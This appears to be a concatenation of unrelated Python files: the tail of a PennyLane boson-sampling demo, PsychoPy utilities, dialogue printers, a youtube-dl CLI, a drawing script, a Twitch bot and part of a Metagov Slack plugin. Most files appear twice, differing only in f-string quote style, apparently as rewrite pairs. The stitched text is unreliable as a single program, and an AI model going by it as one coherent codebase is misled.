two copies of the # first row and first column, making sure to divide by :math:`2!`: A = (np.dot(U, U.T) * np.tanh(1))[:, [0, 0]][[0, 0]] print(np.abs(haf(A)) ** 2 / (2 * np.cosh(1) ** 4)) print(probs[2, 0, 0, 0]) ###################################################################### # The PennyLane simulation results agree (with almost negligible numerical error) to the # expected result from the Gaussian boson sampling equation! # # This demo provides an entry-level walkthrough to the ideas behind GBS, # providing you with the basic code needed for exploring the ideas behind # the photonic quantum advantage paper. Try changing the number of modes, # the number of injected squeezed states, or the cutoff dimension, and # see how each of these affect the classical computation time. If you're # interested in learning more about GBS, or about photonic quantum # computing in general, the # `Strawberry Fields website <https://strawberryfields.ai/>`__ is a great resource. # # References # ---------- # # .. [#Arute2019] # # Arute, F., Arya, K., Babbush, R., et al. "Quantum supremacy using a programmable # superconducting processor" # `Nature 574, 505-510 (2019) <https://doi.org/10.1038/s41586-019-1666-5>`__. # # .. [#Zhong2020] # # Zhong, H.-S., Wang, H., Deng, Y.-H., et al. (2020). Quantum computational advantage using photons. Science, 10.1126/science.abe8770. # # .. [#hamilton2017] # # Craig S. Hamilton, Regina Kruse, Linda Sansoni, Sonja Barkhofen, Christine Silberhorn, # and Igor Jex. Gaussian boson sampling. Physical Review Letters, 119:170501, Oct 2017. # arXiv:1612.01199, doi:10.1103/PhysRevLett.119.170501. # # .. [#aaronson2013] # # Scott Aaronson and Alex Arkhipov. The computational complexity of linear optics. Theory of # Computing, 9(1):143–252, 2013. doi:10.4086/toc.2013.v009a004. # # .. [#Bourassa2020] # # Bourassa, J. E., Alexander, R. N., Vasmer, et al. (2020). Blueprint for a scalable # photonic fault-tolerant quantum computer. arXiv preprint arXiv:2010.02905. #
# Utility functions for Psychopy Experiments # Author: Stefan Uddenberg from psychopy import core, data, event, gui import json import os def tabify(s): """ Takes an array of strings and outputs a single string separated by tab characters :type s: list :param s: list of strings :raises: N/A :rtype: string """ s = '\t'.join(s) return s def rgb2psychorgb(rgbVal): """ Takes a tuple rgbVal on scale from 0 to 255 and returns a tuple along the scale of -1 to 1 (with 0 being gray) :type rgbVal: tuple :param rgbVal: tuple of r,g,b values :raises: N/A :rtype: tuple """ return tuple((x - 127.5) / 127.5 for index, x in enumerate(rgbVal)) def show_instructions(instructions, instructions_list, key_dict, win): """ Shows each instruction string in the list one at a time. :type instructions: psychopy.visual.TextStim :param instructions: The instructions TextStim object :type instructions_list: list :param instructions_list: list of instruction strings :type key_dict: dict :param key_dict: Dictionary of usable key presses :raises: N/A :rtype: void """ for instr in instructions_list: instructions.setText(instr) instructions.draw() win.flip() keys = event.waitKeys(keyList=[v for k, v in key_dict.items()]) if key_dict["quit"] in keys: quit_experiment(win, core) def get_subject_info(data_dir, experiment_name): """ GUI for entering experiment info :type data_dir: string :param data_dir: Data directory :type experiment_name: string :param experiment_name: Name of the experiment :raises: N/A :rtype: """ last_params_file_name = f"{data_dir}{experiment_name}_#_lastParams.json" try: # note the '#', for file-ordering purposes # exp_info = misc.fromFile(last_params_file_name) with open(last_params_file_name, 'r') as fp: exp_info = json.load(fp) except: exp_info = { 'Experiment': experiment_name, 'Testing Location': '', 'Experimenter Initials': 'sdu', 'Subject Initials': '', 'Subject ID': '', 'Subject Age': '', 'Subject Gender': '', } exp_info['Start Date'] = data.getDateStr() dlg = gui.DlgFromDict(exp_info, title=experiment_name, fixed=['Start Date']) if dlg.OK: # misc.toFile(last_params_file_name, exp_info) with open(last_params_file_name, 'w') as fp: json.dump(exp_info, fp) else: core.quit() return exp_info def make_data_file(data_dir, exp_info, info_order, sync=True): """ Creates a data file :type exp_info: dict :param exp_info: Dictionary of experiment information :type info_order: list :param info_order: List of strings specifying the output file header :type sync: bool :param sync: :raises: N/A :rtype: file handle """ file_name = "_".join([exp_info['Experiment'], exp_info['Subject ID'], exp_info['Subject Initials'], exp_info['Subject Age'], exp_info['Subject Gender'], exp_info['Start Date']]) ext = '' i = 1 while os.path.exists(f"{file_name}{ext}.txt"): # changes filename extension to avoid overwriting ext = '-' + str(i) i += 1 file_name = f"{data_dir}{file_name}{ext}" data_file = open(f"{file_name}.txt", 'a') line = tabify(info_order) + '\n' data_file.write(line) if sync: data_file.flush() os.fsync(data_file) return data_file def make_subject_file(data_dir, exp_info, sub_info_order, sync=True): """ Creates a subject file for the experiment :type data_dir: string :param data_dir: Data directory :type exp_info: dict :param exp_info: Dictionary housing all experiment information :type sub_info_order: list :param sub_info_order: List of strings specifying output file header :type sync: :param sync: :raises: N/A :rtype: file_handle """ file_name = f"{data_dir}subFile_{exp_info["Experiment"]}.txt" # Write headers if necessary if not os.path.exists(file_name): line = tabify(sub_info_order) + '\n' # TABify with open(file_name, 'a') as sub_file: sub_file.write(line) sub_file = open(file_name, 'a') line = tabify([str(exp_info[variable]) for variable in sub_info_order]) line += '\n' # add a newline sub_file.write(line) if sync: sub_file.flush() os.fsync(sub_file) return sub_file def write_to_file(file_handle, info, info_order, sync=True): """ Writes a trial (a dictionary) to a fileHandle :type file_handle: :param file_handle: :type info: :param info: :type info_order: :param info_order: :type sync: :param sync: :raises: :rtype: void """ line = tabify([str(info[variable]) for variable in info_order]) + '\n' file_handle.write(line) if sync: file_handle.flush() os.fsync(file_handle) def quit_experiment(win, core): """ Quits an experiment :type win: psychopy.visual.Window :param win: The Window object from Psychopy :type core: psychopy.core :param core: The Core object from Psychopy :raises: N/A :rtype: void """ win.close() core.quit()
# Utility functions for Psychopy Experiments # Author: Stefan Uddenberg from psychopy import core, data, event, gui import json import os def tabify(s): """ Takes an array of strings and outputs a single string separated by tab characters :type s: list :param s: list of strings :raises: N/A :rtype: string """ s = '\t'.join(s) return s def rgb2psychorgb(rgbVal): """ Takes a tuple rgbVal on scale from 0 to 255 and returns a tuple along the scale of -1 to 1 (with 0 being gray) :type rgbVal: tuple :param rgbVal: tuple of r,g,b values :raises: N/A :rtype: tuple """ return tuple((x - 127.5) / 127.5 for index, x in enumerate(rgbVal)) def show_instructions(instructions, instructions_list, key_dict, win): """ Shows each instruction string in the list one at a time. :type instructions: psychopy.visual.TextStim :param instructions: The instructions TextStim object :type instructions_list: list :param instructions_list: list of instruction strings :type key_dict: dict :param key_dict: Dictionary of usable key presses :raises: N/A :rtype: void """ for instr in instructions_list: instructions.setText(instr) instructions.draw() win.flip() keys = event.waitKeys(keyList=[v for k, v in key_dict.items()]) if key_dict["quit"] in keys: quit_experiment(win, core) def get_subject_info(data_dir, experiment_name): """ GUI for entering experiment info :type data_dir: string :param data_dir: Data directory :type experiment_name: string :param experiment_name: Name of the experiment :raises: N/A :rtype: """ last_params_file_name = f"{data_dir}{experiment_name}_#_lastParams.json" try: # note the '#', for file-ordering purposes # exp_info = misc.fromFile(last_params_file_name) with open(last_params_file_name, 'r') as fp: exp_info = json.load(fp) except: exp_info = { 'Experiment': experiment_name, 'Testing Location': '', 'Experimenter Initials': 'sdu', 'Subject Initials': '', 'Subject ID': '', 'Subject Age': '', 'Subject Gender': '', } exp_info['Start Date'] = data.getDateStr() dlg = gui.DlgFromDict(exp_info, title=experiment_name, fixed=['Start Date']) if dlg.OK: # misc.toFile(last_params_file_name, exp_info) with open(last_params_file_name, 'w') as fp: json.dump(exp_info, fp) else: core.quit() return exp_info def make_data_file(data_dir, exp_info, info_order, sync=True): """ Creates a data file :type exp_info: dict :param exp_info: Dictionary of experiment information :type info_order: list :param info_order: List of strings specifying the output file header :type sync: bool :param sync: :raises: N/A :rtype: file handle """ file_name = "_".join([exp_info['Experiment'], exp_info['Subject ID'], exp_info['Subject Initials'], exp_info['Subject Age'], exp_info['Subject Gender'], exp_info['Start Date']]) ext = '' i = 1 while os.path.exists(f"{file_name}{ext}.txt"): # changes filename extension to avoid overwriting ext = '-' + str(i) i += 1 file_name = f"{data_dir}{file_name}{ext}" data_file = open(f"{file_name}.txt", 'a') line = tabify(info_order) + '\n' data_file.write(line) if sync: data_file.flush() os.fsync(data_file) return data_file def make_subject_file(data_dir, exp_info, sub_info_order, sync=True): """ Creates a subject file for the experiment :type data_dir: string :param data_dir: Data directory :type exp_info: dict :param exp_info: Dictionary housing all experiment information :type sub_info_order: list :param sub_info_order: List of strings specifying output file header :type sync: :param sync: :raises: N/A :rtype: file_handle """ file_name = f"{data_dir}subFile_{exp_info['Experiment']}.txt" # Write headers if necessary if not os.path.exists(file_name): line = tabify(sub_info_order) + '\n' # TABify with open(file_name, 'a') as sub_file: sub_file.write(line) sub_file = open(file_name, 'a') line = tabify([str(exp_info[variable]) for variable in sub_info_order]) line += '\n' # add a newline sub_file.write(line) if sync: sub_file.flush() os.fsync(sub_file) return sub_file def write_to_file(file_handle, info, info_order, sync=True): """ Writes a trial (a dictionary) to a fileHandle :type file_handle: :param file_handle: :type info: :param info: :type info_order: :param info_order: :type sync: :param sync: :raises: :rtype: void """ line = tabify([str(info[variable]) for variable in info_order]) + '\n' file_handle.write(line) if sync: file_handle.flush() os.fsync(file_handle) def quit_experiment(win, core): """ Quits an experiment :type win: psychopy.visual.Window :param win: The Window object from Psychopy :type core: psychopy.core :param core: The Core object from Psychopy :raises: N/A :rtype: void """ win.close() core.quit()
from __future__ import annotations import json import os.path import numpy as np from gcdf1.utils.dialogue import ( get_dialogue_outline, get_intent_by_turn, get_utterances, ) np.random.seed(0) def print_dialogue( dialogue: dict, print_index: bool = False, show_intent: bool = False ): """ Parameters ---------- dialogue See `get_dialogue_outline` for structure. print_index If True, each turn will have its number printed. show_intent In each user turn, the active intent is appended. """ utterances = get_utterances(dialogue) intents = [] if show_intent: intents = get_intent_by_turn(dialogue) for i, utterance in enumerate(utterances): if show_intent and i % 2 == 0: utterance = f"{utterance} <intent> {" AND ".join(intents[i // 2])}" if print_index: print(f"{i + 1}: {utterance}") else: print(f"{utterance}") def print_turn_outline(outline: dict[str, list[str]]): """ Parameters ---------- outline Output of `get_turn_actions`. """ for service in outline: print(*outline[service], sep="\n") print("") def print_dialogue_outline( dialogue: dict, text: bool = False, show_intent: bool = False ): """ Parameters ---------- dialogue See `get_dialogue_outline` for structure. text If `True`, also print the utterances alongside their outlines. show_intent If `True`, the intent is shown for each user utterance """ outlines = get_dialogue_outline(dialogue) utterances = get_utterances(dialogue) if text else [""] * len(outlines["dialogue"]) intents = get_intent_by_turn(dialogue) if show_intent else [] has_nlu = any(action_dict for action_dict in outlines["nlu"]) assert len(outlines["dialogue"]) == len(utterances) for i, (dial_outline, nlu_outline, utterance) in enumerate( zip(outlines["dialogue"], outlines["nlu"], utterances) ): if show_intent: utterance = f"{utterance} <intent> {" AND ".join(intents[i // 2])}" print(f"Turn: {i}:{utterance}") print_turn_outline(dial_outline) if has_nlu: print("#" * 15, " NLU ", "#" * 15) print_turn_outline(nlu_outline) print("") if __name__ == "__main__": file = os.path.join("../../", "data/raw/train/dialogues_001.json") with open(file, "r") as f: all_dialogues = json.load(f) # print a random dialogue outline and its turns # NB: This does not work correctly for multiple frames in the same turn dialogue = all_dialogues[np.random.randint(0, high=len(all_dialogues))] print_dialogue(dialogue) print("") print_dialogue_outline(dialogue, text=True) print("")
from __future__ import annotations import json import os.path import numpy as np from gcdf1.utils.dialogue import ( get_dialogue_outline, get_intent_by_turn, get_utterances, ) np.random.seed(0) def print_dialogue( dialogue: dict, print_index: bool = False, show_intent: bool = False ): """ Parameters ---------- dialogue See `get_dialogue_outline` for structure. print_index If True, each turn will have its number printed. show_intent In each user turn, the active intent is appended. """ utterances = get_utterances(dialogue) intents = [] if show_intent: intents = get_intent_by_turn(dialogue) for i, utterance in enumerate(utterances): if show_intent and i % 2 == 0: utterance = f"{utterance} <intent> {' AND '.join(intents[i // 2])}" if print_index: print(f"{i + 1}: {utterance}") else: print(f"{utterance}") def print_turn_outline(outline: dict[str, list[str]]): """ Parameters ---------- outline Output of `get_turn_actions`. """ for service in outline: print(*outline[service], sep="\n") print("") def print_dialogue_outline( dialogue: dict, text: bool = False, show_intent: bool = False ): """ Parameters ---------- dialogue See `get_dialogue_outline` for structure. text If `True`, also print the utterances alongside their outlines. show_intent If `True`, the intent is shown for each user utterance """ outlines = get_dialogue_outline(dialogue) utterances = get_utterances(dialogue) if text else [""] * len(outlines["dialogue"]) intents = get_intent_by_turn(dialogue) if show_intent else [] has_nlu = any(action_dict for action_dict in outlines["nlu"]) assert len(outlines["dialogue"]) == len(utterances) for i, (dial_outline, nlu_outline, utterance) in enumerate( zip(outlines["dialogue"], outlines["nlu"], utterances) ): if show_intent: utterance = f"{utterance} <intent> {' AND '.join(intents[i // 2])}" print(f"Turn: {i}:{utterance}") print_turn_outline(dial_outline) if has_nlu: print("#" * 15, " NLU ", "#" * 15) print_turn_outline(nlu_outline) print("") if __name__ == "__main__": file = os.path.join("../../", "data/raw/train/dialogues_001.json") with open(file, "r") as f: all_dialogues = json.load(f) # print a random dialogue outline and its turns # NB: This does not work correctly for multiple frames in the same turn dialogue = all_dialogues[np.random.randint(0, high=len(all_dialogues))] print_dialogue(dialogue) print("") print_dialogue_outline(dialogue, text=True) print("")
import sys from pathlib import Path if 'set env': sys.path.insert(0, str(Path(__file__).parent.parent)) from youtube_dl_cli import __version__, __exe_name__, __description__ from youtube_dl_cli.download_youtube_video import YLFormat, YoutubeKeeper from youtube_dl_cli.common.consoleHelper import text_color, Fore sys.path.remove(sys.path[0]) from typing import NewType import argparse Name = NewType('Name', str) class CLI: """Command Line Interface""" __slots__ = () BATCH_RUN: Name = 'batch_run' @classmethod def build_parser(cls): def init_common_parameter(sub_parser): ... def init_batch_fix(sub_parser: argparse.ArgumentParser): init_common_parameter(sub_parser) # the bach_fix is sub_parser.add_argument('url_list', help='youtube URL', metavar='URL', nargs='*') # convert to list automatically sub_parser.add_argument('-f', '--format', help=f'The output format. {text_color(f' '.join([msg for msg in YLFormat.__members__]))}' f' default: {text_color('mp4_640_360', Fore.BLUE)}', metavar='YLFormat', default=YLFormat.mp4_640_360, nargs='*', # multiple choice. choices=[key for key in YLFormat.__members__] ) sub_parser.add_argument('--output_dir', help='output directory. default: USERPROFILE/Music/my_music/', type=Path, default=None, ) sub_parser.add_argument('--write_thumbnail', help='Write the thumbnail image to a file', action='store_true', dest='write_thumbnail') sub_parser.add_argument('-q', '--quite', help='Do not print messages to stdout.', action='store_true', dest='quiet') description = __description__ usage = '\n'.join([desc for desc in ['@', 'full command: ' + text_color(f'{__exe_name__} batch_run "url_1" "url_2" --output_dir="C:/Users/Carson/Downloads" --format m4a mp4_144p --quiet --write_thumbnail'), 'voice only : ' + text_color(f'{__exe_name__} batch_run "url_1" -f m4a'), '@' ]]) main_parser = argparse.ArgumentParser(prog=f'{__exe_name__}.exe', description=description, usage=usage, formatter_class=argparse.RawTextHelpFormatter) main_parser.add_argument('--version', action='version', version='%(prog)s \n\tversion:' + f'{__version__}') sub_cmd: argparse._SubParsersAction = main_parser.add_subparsers( title='Available commands', dest='sub_cmd', metavar='' # metavar='SUBCOMMAND', help='DESCRIPTION' ) sub_cmd.required = True batch_fix = sub_cmd.add_parser(cls.BATCH_RUN, help='Automated Batch Processing') init_batch_fix(batch_fix) return main_parser def main(cmd_list: list = None): cli = CLI() parser = cli.build_parser() args = parser.parse_args(cmd_list) if cmd_list else parser.parse_args() fmt_list = [eval(f'{YLFormat.__name__}.{fmt}') for fmt in args.format] download_list = [(url, fmt_list) for url in args.url_list] options = dict(writethumbnail=args.write_thumbnail, quiet=args.quiet) dict_run_app = {cli.BATCH_RUN: lambda: YoutubeKeeper.start(download_list, output_dir=args.output_dir, **options)} app_name = args.sub_cmd dict_run_app[app_name]() return 'FINISHED'
import sys from pathlib import Path if 'set env': sys.path.insert(0, str(Path(__file__).parent.parent)) from youtube_dl_cli import __version__, __exe_name__, __description__ from youtube_dl_cli.download_youtube_video import YLFormat, YoutubeKeeper from youtube_dl_cli.common.consoleHelper import text_color, Fore sys.path.remove(sys.path[0]) from typing import NewType import argparse Name = NewType('Name', str) class CLI: """Command Line Interface""" __slots__ = () BATCH_RUN: Name = 'batch_run' @classmethod def build_parser(cls): def init_common_parameter(sub_parser): ... def init_batch_fix(sub_parser: argparse.ArgumentParser): init_common_parameter(sub_parser) # the bach_fix is sub_parser.add_argument('url_list', help='youtube URL', metavar='URL', nargs='*') # convert to list automatically sub_parser.add_argument('-f', '--format', help=f'The output format. {text_color(f" ".join([msg for msg in YLFormat.__members__]))}' f' default: {text_color("mp4_640_360", Fore.BLUE)}', metavar='YLFormat', default=YLFormat.mp4_640_360, nargs='*', # multiple choice. choices=[key for key in YLFormat.__members__] ) sub_parser.add_argument('--output_dir', help='output directory. default: USERPROFILE/Music/my_music/', type=Path, default=None, ) sub_parser.add_argument('--write_thumbnail', help='Write the thumbnail image to a file', action='store_true', dest='write_thumbnail') sub_parser.add_argument('-q', '--quite', help='Do not print messages to stdout.', action='store_true', dest='quiet') description = __description__ usage = '\n'.join([desc for desc in ['@', 'full command: ' + text_color(f'{__exe_name__} batch_run "url_1" "url_2" --output_dir="C:/Users/Carson/Downloads" --format m4a mp4_144p --quiet --write_thumbnail'), 'voice only : ' + text_color(f'{__exe_name__} batch_run "url_1" -f m4a'), '@' ]]) main_parser = argparse.ArgumentParser(prog=f'{__exe_name__}.exe', description=description, usage=usage, formatter_class=argparse.RawTextHelpFormatter) main_parser.add_argument('--version', action='version', version='%(prog)s \n\tversion:' + f'{__version__}') sub_cmd: argparse._SubParsersAction = main_parser.add_subparsers( title='Available commands', dest='sub_cmd', metavar='' # metavar='SUBCOMMAND', help='DESCRIPTION' ) sub_cmd.required = True batch_fix = sub_cmd.add_parser(cls.BATCH_RUN, help='Automated Batch Processing') init_batch_fix(batch_fix) return main_parser def main(cmd_list: list = None): cli = CLI() parser = cli.build_parser() args = parser.parse_args(cmd_list) if cmd_list else parser.parse_args() fmt_list = [eval(f'{YLFormat.__name__}.{fmt}') for fmt in args.format] download_list = [(url, fmt_list) for url in args.url_list] options = dict(writethumbnail=args.write_thumbnail, quiet=args.quiet) dict_run_app = {cli.BATCH_RUN: lambda: YoutubeKeeper.start(download_list, output_dir=args.output_dir, **options)} app_name = args.sub_cmd dict_run_app[app_name]() return 'FINISHED'
from pyautonifty.constants import DRAWING_SIZE, BLACK from pyautonifty.pos import Pos from pyautonifty.drawing import Drawing from pyautonifty.renderer import Renderer # Draw straight lines that combine to create impression of curved lines def curved_lines(drawing, n=20): # init drawing step = DRAWING_SIZE / n # do curved lines for i in range(n + 1): offset = i * step # do bottom left line drawing.add_straight_line(Pos(offset, DRAWING_SIZE), Pos(0, offset), BLACK, DRAWING_SIZE / (25 * n)) # do top right drawing.add_straight_line(Pos(DRAWING_SIZE, offset), Pos(offset, 0), BLACK, DRAWING_SIZE / (25 * n)) # do diagonal lines for i in range(n - 1): offset = (i + 1) * step # do top left line drawing.add_straight_line(Pos(offset, 0), Pos(0, offset), BLACK, DRAWING_SIZE / (25 * n)) # do bottom right drawing.add_straight_line(Pos(DRAWING_SIZE, DRAWING_SIZE - offset), Pos(DRAWING_SIZE - offset, DRAWING_SIZE), BLACK, DRAWING_SIZE / (25 * n)) # do middle diagonal drawing.add_straight_line(Pos(DRAWING_SIZE, 0), Pos(0, DRAWING_SIZE), BLACK, DRAWING_SIZE / (25 * n)) return drawing if __name__ == "__main__": example_drawing = curved_lines(Drawing()) output_data = example_drawing.to_nifty_import() # Replace previous canvas contents in Nifty.Ink print(f"Lines: {len(example_drawing)}, " f"Points: {sum([len(line["points"]) for line in example_drawing])}, " f"Size: {(len(output_data) / 1024.0 ** 2):.2f}MB") with open("output.txt", "w") as file: file.write(output_data) # Init render class. renderer = Renderer() # Render in a very accurate (but slower) way. renderer.render(example_drawing, filename="curved_lines_%Y_%m_%d_%H-%M-%S-%f.png", simulate=True, allow_transparency=True, proper_line_thickness=True, draw_as_bezier=True, step_size=10)
from pyautonifty.constants import DRAWING_SIZE, BLACK from pyautonifty.pos import Pos from pyautonifty.drawing import Drawing from pyautonifty.renderer import Renderer # Draw straight lines that combine to create impression of curved lines def curved_lines(drawing, n=20): # init drawing step = DRAWING_SIZE / n # do curved lines for i in range(n + 1): offset = i * step # do bottom left line drawing.add_straight_line(Pos(offset, DRAWING_SIZE), Pos(0, offset), BLACK, DRAWING_SIZE / (25 * n)) # do top right drawing.add_straight_line(Pos(DRAWING_SIZE, offset), Pos(offset, 0), BLACK, DRAWING_SIZE / (25 * n)) # do diagonal lines for i in range(n - 1): offset = (i + 1) * step # do top left line drawing.add_straight_line(Pos(offset, 0), Pos(0, offset), BLACK, DRAWING_SIZE / (25 * n)) # do bottom right drawing.add_straight_line(Pos(DRAWING_SIZE, DRAWING_SIZE - offset), Pos(DRAWING_SIZE - offset, DRAWING_SIZE), BLACK, DRAWING_SIZE / (25 * n)) # do middle diagonal drawing.add_straight_line(Pos(DRAWING_SIZE, 0), Pos(0, DRAWING_SIZE), BLACK, DRAWING_SIZE / (25 * n)) return drawing if __name__ == "__main__": example_drawing = curved_lines(Drawing()) output_data = example_drawing.to_nifty_import() # Replace previous canvas contents in Nifty.Ink print(f"Lines: {len(example_drawing)}, " f"Points: {sum([len(line['points']) for line in example_drawing])}, " f"Size: {(len(output_data) / 1024.0 ** 2):.2f}MB") with open("output.txt", "w") as file: file.write(output_data) # Init render class. renderer = Renderer() # Render in a very accurate (but slower) way. renderer.render(example_drawing, filename="curved_lines_%Y_%m_%d_%H-%M-%S-%f.png", simulate=True, allow_transparency=True, proper_line_thickness=True, draw_as_bezier=True, step_size=10)
from requests import get import time from datetime import datetime def cmd(self, user, channel, args): def url(arg): return f"https://api.twitch.tv/kraken/{arg}" headers = {"Client-ID": self.CLIENT_ID, "Authorization": f"OAuth {self.SETUP.startup()["token"]}", "Accept": "application/vnd.twitchtv.v5+json"} try: user1 = args[0].lower() try: channel1 = args[1].lower() except IndexError: channel1 = channel["name"].lower() channel1 = channel1[1:len(channel1)] user1 = args[0].lower() except IndexError: user1 = user["name"].lower() channel1 = channel["name"].lower() channel1 = channel1[1:len(channel1)] if user1.lower() == channel1.lower(): self.send_message( f"@{user["name"]}, you cannot follow yourself FeelsBadMan", channel["name"]) return resp = get(url(f"users?login={user1.lower()},{channel1.lower()}"), headers=headers).json() if resp["_total"] <= 1: self.send_message("MrDestructoid Not Found", channel["name"]) return sub_user_id = resp["users"][0]["_id"] sub_channel_id = resp["users"][1]["_id"] fa = get(url(f"users/{sub_user_id}/follows/channels/{sub_channel_id}"), headers=headers).json() print(fa) #2021-02-12T14:44:03Z FMT = "%Y-%m-%dT%H:%M:%SZ" gmt = time.strftime(FMT, time.gmtime()) print(gmt) follow_time = datetime.strptime(fa['created_at'], FMT) now_time = datetime.strptime(gmt, FMT) tdelta_month = (follow_time.year - now_time.year) * 12 + (follow_time.month - now_time.year) print(tdelta_month) try: if fa['message'] == "Follow not found": self.send_message( f"@{user["name"]}, {resp["users"][0]["display_name"]} is not following {resp["users"][1]["display_name"]} FeelsBadMan", channel['name']) return except KeyError: self.send_message( f"@{user["name"]}, {resp["users"][0]["display_name"]} is followig {resp["users"][1]["display_name"]} since {fa["created_at"]}", channel['name'])
from requests import get import time from datetime import datetime def cmd(self, user, channel, args): def url(arg): return f"https://api.twitch.tv/kraken/{arg}" headers = {"Client-ID": self.CLIENT_ID, "Authorization": f"OAuth {self.SETUP.startup()['token']}", "Accept": "application/vnd.twitchtv.v5+json"} try: user1 = args[0].lower() try: channel1 = args[1].lower() except IndexError: channel1 = channel["name"].lower() channel1 = channel1[1:len(channel1)] user1 = args[0].lower() except IndexError: user1 = user["name"].lower() channel1 = channel["name"].lower() channel1 = channel1[1:len(channel1)] if user1.lower() == channel1.lower(): self.send_message( f"@{user['name']}, you cannot follow yourself FeelsBadMan", channel["name"]) return resp = get(url(f"users?login={user1.lower()},{channel1.lower()}"), headers=headers).json() if resp["_total"] <= 1: self.send_message("MrDestructoid Not Found", channel["name"]) return sub_user_id = resp["users"][0]["_id"] sub_channel_id = resp["users"][1]["_id"] fa = get(url(f"users/{sub_user_id}/follows/channels/{sub_channel_id}"), headers=headers).json() print(fa) #2021-02-12T14:44:03Z FMT = "%Y-%m-%dT%H:%M:%SZ" gmt = time.strftime(FMT, time.gmtime()) print(gmt) follow_time = datetime.strptime(fa['created_at'], FMT) now_time = datetime.strptime(gmt, FMT) tdelta_month = (follow_time.year - now_time.year) * 12 + (follow_time.month - now_time.year) print(tdelta_month) try: if fa['message'] == "Follow not found": self.send_message( f"@{user['name']}, {resp['users'][0]['display_name']} is not following {resp['users'][1]['display_name']} FeelsBadMan", channel['name']) return except KeyError: self.send_message( f"@{user['name']}, {resp['users'][0]['display_name']} is followig {resp['users'][1]['display_name']} since {fa['created_at']}", channel['name'])
import json import logging import random from rest_framework.exceptions import ValidationError import metagov.core.plugin_decorators as Registry import requests from metagov.core.errors import PluginErrorInternal from metagov.core.models import GovernanceProcess, Plugin, ProcessStatus, AuthType logger = logging.getLogger(__name__) @Registry.plugin class Slack(Plugin): name = "slack" auth_type = AuthType.OAUTH config_schema = { "type": "object", "properties": { # these are set automatically if using the oauth flow "team_id": {"description": "Slack Team ID", "type": "string"}, "team_name": {"description": "Slack Team Name", "type": "string"}, "bot_token": {"description": "Bot Token", "type": "string"}, "bot_user_id": {"description": "Bot User ID", "type": "string"}, }, } class Meta: proxy = True def receive_event(self, request): """ Passes on ALL received events to the driver """ json_data = json.loads(request.body) if json_data["type"] != "event_callback" or json_data["team_id"] != self.config["team_id"]: return # Data types: https://api.slack.com/apis/connections/events-api#the-events-api__receiving-events__events-dispatched-as-json # Event list: https://api.slack.com/events event = json_data["event"] # pop off 'type' and 'user' since they are represented separately in metagov-style event event_type = event.pop("type") maybe_user = event.pop("user", None) logger.debug(f"Received event {event_type}") initiator = { "user_id": maybe_user, "provider": "slack", "is_metagov_bot": maybe_user and maybe_user == self.config["bot_user_id"], } self.send_event_to_driver(event_type=event_type, initiator=initiator, data=event) @Registry.action( slug="post-message", input_schema={ "type": "object", "properties": {"users": {"type": "array", "items": {"type": "string"}}, "channel": {"type": "string"}}, }, description="Post message either in a channel, direct message, or multi-person message. Supports all params accepted by Slack method chat.postMessage.", ) def post_message(self, parameters): bot_token = self.config["bot_token"] data = {"token": bot_token, **parameters} # note: parameters may include a token override! if not parameters.get("users") and not parameters.get("channel"): raise ValidationError("users or channel are required") if parameters.get("users") and not parameters.get("channel"): # open a conversation for DM or multi person message users = ",".join(parameters.get("users")) params = {"token": bot_token, "users": users} response = self.slack_request("POST", "conversations.open", data=params) channel = response["channel"]["id"] logger.debug(f"Opened conversation {channel} with users {users}") data["channel"] = channel return self.slack_request("POST", "chat.postMessage", data=data) def join_conversation(self, channel): return self.slack_request( "POST", "conversations.join", data={"token": self.config["bot_token"], "channel": channel} ) @Registry.action( slug="method", input_schema={ "type": "object", "properties": {"method_name": {"type": "string"}}, "required": ["method_name"], }, description="Perform any Slack method (provided sufficient scopes)", ) def method(self, parameters): """ Action for performing any method in https://api.slack.com/methods See also: https://api.slack.com/web#basics Example usage: curl -iX POST "https://metagov.policykit.org/api/internal/action/slack.method" -H "accept: application/json" -H "X-Metagov-Community: slack-tmq3pkxt9" -d '{"parameters":{"method_name":"chat.postMessage", "channel":"C0177HZTV7X", "text":"hello world"}}' curl -iX POST "https://metagov.policykit.org/api/internal/action/slack.method" -H "accept: application/json" -H "X-Metagov-Community: slack-tmq3pkxt9" -d '{"parameters":{"channel":"C0177HZTV7X","method":"pins.add","timestamp":"1622820212.008000"}}' curl -iX POST "https://metagov.policykit.org/api/internal/action/slack.method" -H "accept: application/json" -H "X-Metagov-Community: slack-tmq3pkxt9" -d '{"parameters":{"channel":"C0177HZTV7X","method":"pins.remove","timestamp":"1622820212.008000"}}' """ method = parameters.pop("method_name") # note: parameters may include a token override! data = {"token": self.config["bot_token"], **parameters} try: return self.slack_request("POST", method, data=data) except PluginErrorInternal as e: # TODO: make this configurable, might not be desirable in all cases. Bot must be in the channel for `reaction.add` method to work (and others). if e.detail == "not_in_channel" and data.get("channel"): logger.warn(f"Failed with not_in_channel. Adding bot to channel {data["channel"]} and retrying...") self.join_conversation(data["channel"]) return self.slack_request("POST", method, data=data) else: raise def slack_request(self, method, route, json=None, data=None): url = f"https://slack.com/api/{route}" logger.debug(f"{method} {url}") resp = requests.request(method, url, json=json, data=data) if not resp.ok: logger.error(f"{resp.status_code} {resp.reason}") logger.error(resp.request.body) raise PluginErrorInternal(resp.text) if resp.content: data = resp.json() is_ok = data.pop("ok") if not is_ok: # logger.debug(f"X-OAuth-Scopes: {resp.headers.get("X-OAuth-Scopes")}") # logger.debug(f"X-Accepted-OAuth-Scopes: {resp.headers.get("X-Accepted-OAuth-Scopes")}") # logger.debug(data["error"]) raise PluginErrorInternal(data["error"]) return data return {} EMOJI_MAP = { "numbers": [ "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "keycap_ten", ], "flowers": [ "tulip", "sunflower", "cherry_blossom", "rose", "wilted_flower", "bouquet", "hibiscus", "blossom", ], "hearts": [ "blue_heart", "purple_heart", "heart", "green_heart", "sparkling_heart", "orange_heart", "green_heart", ], } class Bool: YES = "yes" NO = "no" @Registry.governance_process class SlackEmojiVote(GovernanceProcess): # TODO(enhancement): let the caller define the emoji for each option # TODO(enhancement): add suport for "closing_at" time # TODO(enhancement): support single-choice and multiple-choice # TODO(enhancement): only allow one vote per person on boolean votes name = "emoji-vote" plugin_name = "slack" input_schema = { "type": "object", "properties": { "title": {"type": "string"}, "options": { "type": "array", "items": {"type": "string"}, "description": "options to use for choice selection. ignored for 'boolean' poll type", }, "details": {"type": "string"}, "poll_type": {"type": "string", "enum": ["boolean", "choice"]}, "channel": { "type": "string", "description": "channel to post the vote in", }, "users": { "type": "array", "items": {"type": "string"}, "description": "users to participate in vote in a multi-person message thread. ignored if channel is provided.", }, "emoji_family": { "type": "string", "enum": 